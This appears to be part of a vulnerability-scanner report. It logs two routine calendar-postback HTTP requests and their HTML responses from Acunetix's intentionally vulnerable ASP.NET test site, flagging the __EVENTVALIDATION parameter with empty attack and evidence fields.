Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8522&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDANSygStsIZGRkkB1yhN9QOMB2Aw%2B5NXD%2BMlJxWPw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKO%2BsCpBwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAz6Sq5sfyVn9h0eEr4IyY2toh4dm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:53 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDANSygStsIZGRkkB1yhN9QOMB2Aw+5NXD+MlJxWPw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKO+sCpBwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAz6Sq5sfyVn9h0eEr4IyY2toh4dm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:White" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1185 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,185 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8294&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDABmZ2l9oIZGRkcLeTgBeDlt4BUkCWewkLQY%2FDXX0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKo4bj%2BBgLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAuk6QzrvDujVD5qOQQHM%2FKdIeqJe
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:18 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDABmZ2l9oIZGRkcLeTgBeDlt4BUkCWewkLQY/DXX0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKo4bj+BgLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAuk6QzrvDujVD5qOQQHM/KdIeqJe" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:White" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who 